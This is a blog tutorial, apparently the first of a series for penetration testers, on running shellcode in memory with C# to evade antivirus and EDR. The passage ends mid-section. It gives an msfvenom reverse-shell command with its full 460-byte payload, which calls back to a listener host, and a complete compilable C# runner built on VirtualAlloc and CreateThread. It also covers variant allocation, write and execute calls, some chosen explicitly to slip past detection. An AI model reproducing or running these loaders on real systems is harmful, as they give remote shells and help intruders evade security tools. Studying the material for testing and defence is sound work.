Introduction to C# for penetration testers: Section 1 Running stuff in memory, Part 1 Shellcode
This is the first of a blog series on using C# for offensive security, with a particular focus for penetration testers. For the first topic, I will focus on possibly the most useful task for penetration testers, AV/EDR bypassing other’s tools and scripts.
Why?
So many amazing tools and exploits are constantly being developed (and have existed for a long time) that we as pentesters, can and do use on a daily basis. Re-developing these tools from scratch will take time and effort that is simply not feasible. Because of this, being able to take other’s tools, and develop custom AV/EDR bypass methods can allow a pentester to quickly whip up a version of a tool that does not get caught by Anti-Virus (AV), and can be executed in the event an application whitelist is bypassed (looking at you MSBuild).
Ok, but why C#?
C# is a high level language, this makes it very quick and relatively easy to develop and modify. It is built using the powerful .NET Common Language Runtime (CLR) giving access to both the native and Win32 API’s. This gives C# the ability to perform very useful tasks, such as running shellcode in memory, running Portable Executable’s, token manipulation just to name a few. This means, as a penetration tester, C# is a language that can be relatively easily written, modified and deployed during engagements, requiring hours instead of days to develop.
C# vs .NET vs CLR vs …
Often .NET and C# are used interchangeably but this is not true. C# is a programming language that uses the .NET Framework, which is run within the Common Language Runtime. The code that runs in the Common Language Runtime is called Microsoft Intermediate Language (MSIL). It is the CLR’s responsibility to convert this Intermediate Language into native code (via the Just In Time (JIT) compiler) that in turn is actually run by the Operating System.
Multiple programming languages exist that use the .NET Framework and CLR, including VB.NET, a variation of C++ (C++ .NET), Iron Python and PowerShell. Whilst not entirely true, this is a similar concept to Java being converted to byte code, that is in turn run on the Java Virtual Machine (JVM).
The image below gives a visual diagram of the differences.

What this means, is that when we run a C# developed program (a .NET assembly, sometimes called managed code) we are restricted in what we can and cannot do by the capabilities provided to us by the CLR we run within, this becomes important when discussing AV/EDR bypassing.
Running stuff in memory
The first important concept to cover is the concept of running stuff in memory. Long go the times where you can simply drop some msfconsole generated executable on disk and not expect every single Anti-Virus in existence to nuke it off the face of the Earth. So for us this means we can’t directly drop generated exe’s/payload files to disk, as this will immediately (well should) get flagged and be useless to us.
In comes the concept of running payloads in memory. This allows us to hopefully defeat static analysis performed by Anti-Virus by finding tricky ways to encrypt and run payloads dynamically, significantly reducing the chances of our payloads getting caught.
Running shellcode in memory via Win32 API’s
The first thing we will run in memory is shellcode. If you don’t know, shellcode can be generally thought of as “malicious” native code, that is pure native code that if directly run will do some bad thing. At first this code would provide shell, hence the term shellcode, but can now mean much more.
Running shellcode in memory is a very well studied and known topic. For this we will only be discussing “self” injection methods, that is running shellcode within the same process, i.e. ours. In general the steps to executing Position Independent shellcode does:
- Allocate memory for the shellcode (usually with Write/Execute permissions).
- Write shellcode to newly allocated memory.
- Execute the shellcode
- Profit 😊
So how do we actually do this in C#? To do this we will use the Win32, native API’s and/or built in .NET functionality. The Win32 API is an API written in C and developed by Microsoft to be used by developers of Windows applications to interact with the Windows Operating System. This allows applications running in user mode to do actions such as list files in directories, obtain handles to access tokens, allocate memory ect.
The native API’s are an API written in C and developed by Microsoft, but it is not intended to be used by developers. These API’s are responsible of switching from user to kernel mode and actually calling syscalls. They are not officially documented (unlike the Win32 API), but are called by the Win32 API. You can think of the Win32 API as the one that was made to do validation checks and be easier to use then the native API. Whilst the native API is responsible for performing the actions on the kernel side of things. Most of the time we will be using the Win32 API. @YUVAL0X92 has a good blog showing the difference’s between the two here.
But C# runs within the CLR, and the Win32 API compiled C code (i.e. unmanaged code) in the format of a Dynamic Linked Library (DLL), so how do we run functions defined in the Win32 API? Luckily the CLR has an API that can be leveraged to perform such a task, called Platform Invoke (shortened to PInvoke).
This is an API that allows managed code to provide a location to a unmanaged library and function definition (termed prototype) containing its name, input parameters and return type. A lot of C data types do not directly exist in C#/.NET, and a part of PInvoke’s job is to handle the translation between the C# data type, and the actual data type required for the Win32 API call.
How do we actually use this? First we need to include the namespace (can be thought of as a “package”) that contains the PInvoke API (System.Runtime.InteropServices), add the DLLImport keyword and the function prototype (with the C data types written in the .NET equivalent).
But how do we know what data types correspond to what data types in .NET? There’s no official documentation, but the site pinvoke.net has a collection of common Win32 API’s function prototype’s for use in C#, so this is a great resource if you get stuck.
POC Code
OK, so enough talking, time for some code.
For the first example, we will use the VirtualAlloc Win32 API for the allocation of memory, Marshal.Copy .NET method for writing to this allocated memory, and CreateThread Win32 API to make a new thread that in turn will execute the memory we have allocated.
Firstly we will create some shellcode using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.105 LPORT=1337 -f csharp -v shellCode 130 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of csharp file: 2368 bytes
byte[] shellCode = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0x38,0x69,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };
This is then used within a C Sharp file that executes the shellcode.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace ShellCodeRunner {
public class Program {
[DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
static void Main(string[] args)
{
byte[] shellCode = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x05,0x39,0xc0,0xa8,0x38,0x69,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };
IntPtr rwxMemory = VirtualAlloc(IntPtr.Zero, (uint)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellCode, 0, rwxMemory, shellCode.Length);
IntPtr shellCodeThread = CreateThread(IntPtr.Zero, 0, rwxMemory, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(shellCodeThread, 0xFFFFFFFF);
}
}
}
You can use either Visual Studio or csc.exe to compile the file. Assuming its saved at Program.cs, run the following to compile it to Program.exe:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Program.cs
Microsoft (R) Visual C# Compiler version 4.8.4084.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
Then when run with msfconsole set up, a shell is caught :)


What is this?
We first start by importing the Win 32 API functions we want by using the DllImport keyword, a part of the PInvoke to import certain functions from specific DLL’s. Specifically on line x, we say from the kernel32.dll, import the function with the name CreateThread that will return a pointer to an int, that takes an int pointer, unsigned 32 bit int, int pointer, int pointer, unsigned 32 bit int and another int pointer as arguments. If we look at the official documentation for the prototype for CreateThread we will see that this isn’t exactly the same:
HANDLE CreateThread(
[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
[in] SIZE_T dwStackSize,
[in] LPTHREAD_START_ROUTINE lpStartAddress,
[in, optional] __drv_aliasesMem LPVOID lpParameter,
[in] DWORD dwCreationFlags,
[out, optional] LPDWORD lpThreadId
);
As you can see, the data types from the official prototype are different to the one we are using. This is in part the magic that PInvoke performs. We use pinvoke.net to find the actual prototype we need to use here.
We repeat this import/translation process for WaitForSingleObject and VirtualAlloc Win32 API’s.
Within the program’s main method, we start by declaring a byte array that contains our shellcode we want to execute (coming from msfvenom).
Next we allocate RWX (Read, Write, Execute) process memory by using the VirtualAlloc Win32 API call (line 57). The first argument to this call is what start address do we want for the memory, in our case we don’t care so we pass it a zero pointer. Next argument we specify how much memory we want to allocate (VirtualAlloc works with page’s) saying we want at least the size of the shellcode allocated. We say we want the memory to be committed (the third argument), meaning we want to actually allocate and map this memory physically (as apposed to “reserving” a particular virtual memory address). This argument is a DWORD flag, where the values can be found here. We set a variable called MEM_COMMIT with this value as an unsigned integer on line 20. Similarly we specify the memory protection of the requested memory to be PAGE_EXECUTE_READWRITE (0x40) using the common memory protection constants located here. This specifies the memory can be read, written to and executed from. The return of this call will be the memory address pointer (IntPtr) of the newly allocated memory.
On line 59 we use the .NET Marshal.Copy method (located within the System.Runtime.InteropServices) namespace. Marshal has a bunch of useful methods as part of the Reflection API to help convert from managed to unmanaged code. This method copies memory from a managed array to an unmanaged section of memory (i.e. the type we allocated). Here we copy the shellCode byte array (first argument), starting at the first index of the area (0) (second argument), specifying the destination address (the newly allocated address) and the amount of data to copy (being the length of the shellCode array).
Next on line 60 we use the Win32 API CreateThread to create a new thread to run the shellcode. The first argument specifies a pointer to a SECURITY_ATTRIBUTES structure which states if a child process can inherit (use) the returned handle to the new thread. We don’t really care, so for simplicity we pass it “NULL” which is an IntPtr.Zero object. The second argument specifies the size of the stack to use, we again don’t care and just want it to use the default set for this executable (hence we pass 0). The third argument is the start memory address of the code we want this thread to run. In this case we want it to run the shellcode written in the RWX memory, so we pass that as this parameter. The next argument is the parameters to pass along to the code to be run. We aren’t passing parameters so we again pass it “NULL” being IntPtr.Zero. We specify the creation flag to be “0”, which indicates to immediately run this thread after its created (the other flags can be found here). The final argument is a pointer to the thread ID we want to use. We don’t care, so again we pass NULL (IntPtr.Zero) as this argument.
When this line is run, we obtain a handle to a newly created thread, and the thread starts running our shellcode. However this isn’t a blocking call, that is the program by default won’t wait for the thread to finish, and instead will simply terminate the process (including this thread) almost immediately.
To stop this we use the Win32 API WaitForSingleObject is used to make this calling process wait for the thread to “signal” (enter a signable state), effectively halting execution (and therefore termination) until the thread alerts the process (i.e. it terminates). The first argument to this function is a handle to the object this process should “wait” for, in our case we want the newly created thread running our shellcode, so we pass the return value from CreateThread. The second argument is the amount of milliseconds to wait for (after which this process will continue anyway), since we don’t want this to terminate, we pass the maximum amount of milliseconds possible (0xFFFFFFFF).
Variations of this
This is only one example of step 1,2,3 to run shellcode in memory. Below I will cover some different API calls that can be used for each of the three steps
Part 1 - RWX Memory
VirtualAllocEx
Very similar to VirtualAlloc, the VirtualAllocEx Win32 API allocates memory, but allows you to specify the process we want to do this for. The P/Invoke signature for this is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
In comparison to VirtualAlloc, the only additional parameter is the first one, being a handle (IntPtr) to the process we want to allocate memory into to. We can obtain a handle to our own process by using the GetCurrentProcess Win32 API which does exactly what it says, it returns a handle to the current process. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
These two API’s can then be used as such:
IntPtr rwxMemory = VirtualAllocEx(GetCurrentProcess(), IntPtr.Zero, shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
VirtualAllocExNuma
VirtualAllocExNuma is a variation of VirtualAllocEx that allows you to specify the NUMA node (in simple terms a NUMA node is a CPU + memory, so two CPU’s with their own local memory would be two separate NUMA nodes, but if they share the same local memory, they are one NUMA node). The P/Invoke signature for this is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
The only additional parameter here is the last one, nndPreferred. This allows us to specify which NUMA node to try and allocate memory on. For our purposes, we don’t really care so we can just pass it the first node (0).
IntPtr rwxMemory = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);
You might ask, why would we bother doing this? Isn’t it the same as VirtualAllocEx in this case? Yes it is, but it is less commonly used, meaning it might bypass AV/EDR checks simply by being a rarely used API.
NtCreateSection/NtMapViewOfSection
The NtCreateSection API can be used to create a Section within a process. What’s a section? A section is a special block of memory that is made to be shared between processes. A process can create a section, that can be mapped by other processes (or this one), and data written to the section can be read by any other process that has mapped the section.
This allows us to create a section, then map it into our processes virtual address space with RWX permissions, and use this to store and run our shellcode.
The P/Invoke signature for NtCreateSection is:
[DllImport("ntdll.dll")]
public static extern UInt32 NtCreateSection(ref IntPtr section,UInt32 desiredAccess,IntPtr pAttrs,ref long MaxSize,uint pageProt,uint allocationAttribs,IntPtr hFile);
The first argument is a pointer to a handle (converted to the IntPtr type) that will be populated with a handle to the newly created section. Secondly is the argument that specifies what types of access may be used when this section is mapped by a call to NtMapViewOfSection. This allows us to say that this section can’t be mapped with execute permissions, but only read permissions for example, or with any access (RWX). The values are constants that can be found here. In our case we want to be able to map the section to our process with RWX permissions, so we use the SECTION_ALL_ACCESS (SECTION_MAP_WRITE(0x0002)|SECTION_MAP_READ(0x0004)|SECTION_MAP_EXECUTE(0x0008)) value, these values can be found here.
The next argument is a pointer to OBJECT_PROPERTIES structure, which allows you to set certain properties of the object (in this case section) when its created, for example the root directory, and its security descriptor. This is an optional argument, and we don’t need to use any of these, so we pass a NULL pointer (IntPtr.Zero).
The next argument is a pointer to a LARGE_INTEGER (in C#, this is a long) that specifies the maximum size (in bytes) of the section. We only need the this to be the size of the shellcode so we set the maximum to the size of the shellcode array. The fifth argument is what memory protections should be applied to the pages allocated for the section. We wan’t to be able to give RWX permissions, so we set this to PAGE_EXECUTE_READWRITE (the same value as VirtualAlloc).
The sixth argument, states if the memory allocated for the section should be commited or reserved (similarly to VirtualAlloc) we want this to be committed, so we use the SEC_COMMIT (0x08000000) value.
The final argument is an optional file handle. This allows the section to be created against a specific file, or if set to NULL, then it will be created using the paging file. Since we are happy to use the default, we pass in NULL (IntPtr.Zero).
The below code will create the section by calling NtCreateSection function:
IntPtr sectionHandle = IntPtr.Zero;
long sizeLong = Convert.ToInt64(shellCode.Length);
NtCreateSection(ref sectionHandle, SECTION_ALL_ACCESS, IntPtr.Zero, ref sizeLong, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero);
With the section created, we can now map it to this processes virtual address space, with RWX permissions. The mapping is done using the NtMapViewOfSection API call. The P/Invoke signature for this function is:
[DllImport("ntdll.dll")]
public static extern UInt32 NtMapViewOfSection(IntPtr SectionHandle,IntPtr ProcessHandle,ref IntPtr BaseAddress,IntPtr ZeroBits,IntPtr CommitSize,ref long SectionOffset,ref long ViewSize,uint InheritDisposition,uint AllocationType,uint Win32Protect);
The first argument is the handle to the section we want to map (for us, the one we just created), the second is a handle to the process we want to map the section to (in our case, we are doing this in our process, so we can reuse the GetCurrentProcess() Win32 API to get a handle), the third is a pointer to a virtual address that will be populated with the virtual address of the start of this mapped section, if its value does not start as NULL it will be attempted to be used as the starting address (in our case, we don’t care where this gets mapped, so we pass in NULL (IntPtr.Zero)). The fourth parameter states how many high bits must not be set in the base address, to be honest I’m not entirely sure what the use of this is, but we will again just pass NULL (IntPtr.Zero) for its value. The next argument states the size of the commited region (if there was one) that was made for the mapped section. In our case, we can ignore this and pass NULL (IntPtr.Zero) as its value.
Next is a pointer to a large integer (long) that allows us to say at what offset into the section should the view be mapped (for example, we could say skip the first 5 bytes), in our case we don’t want to skip any bytes so we simply pass a long set to 0, with the ref keyword to say we are passing a “reference” to our variable. The next argument states how big the size of the view we want (in bytes as a pointer to a SIZE_T (long) value)), so we could say only map the first 2 bytes of the section. In our case, we don’t want to skip any, so we say we want to map the size of the shellcode array (technically this value works in pages, so we won’t just be mapping the exact number of bytes).
The next argument specifies if child processes should inherit this mapped view (a SECTION_INHERIT constant), saying either to share or not to share. We aren’t using child processes that will use this map, so we pass the ViewUnmap (do not share) value of 0x2. These values can be found here.
Next is an argument specifying how attributes about the allocated memory (similar to VirtualAlloc). However in this case, no matter what the value is (as long as its not MEM_RESERVE) the memory is “commited”, so we can just pass it 0, since it will do what we need anyway (slighly dodgy, but hey it works). The final argument is the memory protections, which we specifically want this memory to mapped as RWX memory, so we pass in PAGE_EXECUTE_READWRITE. Finally this means to call the API we do:
long localSectionOffset = 0;
IntPtr ptrLocalSectionAddress = IntPtr.Zero;
NtMapViewOfSection(sectionHandle, GetCurrentProcess(), ref ptrLocalSectionAddress, IntPtr.Zero, IntPtr.Zero, ref localSectionOffset, ref sizeLong, 0x2, 0, PAGE_EXECUTE_READWRITE);
Now we can use ptrLocalSectionAddress as RWX memory.
For good programming practice, we should also be calling NtUnmapViewOfSection to unmap the section mapping, and NtClose() to close the section object after our shell code is finished running … but we can leave that as an exercise for the reader.
You might have also noticed that the API names start with “Nt” and the P/Invoke signature is loading these functions from “ntdll.dll” instead of “kernel32.dll” as in the other examples. This is because these are native API’s, not Win32 API’s.
Part 2 - Write memory
RtlMoveMemory
The RtlMoveMemory Win32 API lets you copy memory from one block to another block (allowing us to also specify the number of bytes to copy). The P/Invoke signature for this API is:
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
public static extern void RtlMoveMemory(IntPtr destData, IntPtr srcData, int size);
The first argument is a pointer to the memory location of the destination memory (in our case the RWX memory we allocated), the second is a pointer to the location of the source memory (in our case our shellCode array). And the third argument is the number of bytes to copy from the source, to the destination. We do have one problem though, we need a pointer to the byte array holding our shellcode, which will require a little work, as seen below. To copy the shellCode with this API call we can run:
unsafe{
fixed (byte* p = shellCode){
IntPtr shellCodePtr = (IntPtr)p;
RtlMoveMemory(rwxMemory, shellCodePtr, shellCode.Length);
}
}
We create the pointer to our byte array (byte* p = shellCode), but we use this “fixed” code block. This specifically tells the Garbage Collector, for this section of code, DO NOT move (change the memory location of) the object on the right (shellCode) and allow us to have a pointer to it (p). If we didn’t use the fixed keyword, the pointer could quickly point somewhere random, as the Garbage Collector may have moved the exact memory location of the shellCode array, making our pointer useless.
When we start doing lower level memory operations (including messing with pointers) the CLR states that “we can no longer verify your code is ‘safe’” meaning you could do something that could crash your program (or potentially open yourself up to memory corruption vulnerabilities), without the CLR performing sanity (verifiably safe) checks first. We must specifically allow this by using the “unsafe” keyword around the block of code using the memory pointer, and must also ensure the compiler allows unsafe code (in csc.exe, this means adding the /unsafe flag).
Finally after having a pointer to our shell code array, we convert it to the IntPtr type by doing a type cast, then we can finally call the RtlMoveMemory API function, with the destination of our RWX memory, where we copy the length of the shellcode array in bytes (.Length).
WriteProcessMemory
The WriteProcessMemory Win32 API lets you write memory from an array to a specified process (or in our case, our own). The P/Invoke signatured is:
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
The first argument is a handle to the process to write to (in our case, we will reuse the GetCurrentProcess Win32 API), the second is a pointer to the memory address to start writing to (the location of the RWX memory), the third is a byte array containg the data to be written (our shellcode), the forth is the number of bytes to write (the size of the array from the previous argument) and the last argument is a pointer to an int that will contain the number of bytes that the call to WriteProcessMemory actually wrote. The call to write can be done by:
IntPtr outSize;
WriteProcessMemory(GetCurrentProcess(), memAddress, shellCode, shellCode.Length, out outSize);
Part 3 - Execute
Delegates
Instead of using Win32 API’s we can use a builtin feature of .NET, called delegates. Delegates are a part of the built in Reflection API, that allow you to dynamically state the location of a function, by only stating its method signature (return type and parameters). This lets you create a reference to a function, by saying its “here” (create a reference to it) somewhere in memory. This allows you to say, hey I there will be a function later on that will have this return type and these parameters, I’ll let you know where it is later (when running the code). This means we can simply say our shellcode should be treated as a function, and run.
This is achieved by creating a delegate (and placing this outside of a class, similar to a DllImport statement)
delegate int ShellCodeFunc();
This code specifies a new data type, thats actually a function, that when run will return an int, and takes no argument. This type is called ShellCodeFunc.
Once we have this, we can use the Marshal function, Marshal.GetDelegateForFunctionPointer function to get a function pointer, that uses our new function definition for a particular region of memory, allowing us to create an instance of our function. Specifically we can run:
ShellCodeFunc shellCodeFunc = Marshal.GetDelegateForFunctionPointer<ShellCodeFunc>(rwxMemory);
shellCodeFunc();
The first line, creates a new ShellCodeFunc object (a delegate) by using the GetDelegateForFunctionPointer function (typed to the ShellCodeFunc signature) to create a usuable pointer to our RWX memory. The second line treats this object (function pointer) as a function and runs it (effectively running the shellcode stored in the RWX memory).
QueueUserAPC
Threads have an asynchronous procedure call queue (APC queue). This is a queue that contains objects (APC objects) that a thread will execute when it is in an alertable state. These APC objects can be thought of as pointers to functions for a thread to run when it “wakes up” from an alertable state. This can happen for example when a thread calls the SleepEx or WaitForSingleObject Win32 API’s. We can add a APC object to a thread’s queue by calling the QueueUserAPC Win32 API function. This will add a user-mode APC object to a specified thread’s APC queue.
We can use the APC queue to add an APC object that points to our shellcode to the executing thread (our main thread) and make it enter an alertable state, which in turn will cause the thread to view and run objects within its APC queue. But how do we make a thread just enter an alertable state without making it wait for some other object (i.e. another thread?), well there’s a native API function called NtTestAlert which will empty the calling thread’s APC queue (pretending it was put into an alertable state). Cool, so we can call QueueUserAPC on the current thread, and then call the NtTestAlert function to empty the APC queue and run the APC object we added.
First we get a handle to the calling thread by calling the GetCurrentThread Win32 API to get a handle to the calling thread. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentThread();
Which we can call to get the handle:
IntPtr pt = GetCurrentThread();
Now we call QueueUserAPC. The P/Invoke signature for this is:
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
The first argument is a pointer to the function to run (function pointer, specifically this a pointer to an APC function), in our case this the pointer to the shellcode we want to execute, second is a handle (IntPtr) to the thread we want to add to its queue. The last argument is a pointer to the parameter’s we want to pass to our APC function, since we aren’t passing parameters to the APC function, we just pass in a NULL pointer (IntPtr.Zero). This means we run the following to add to the queue:
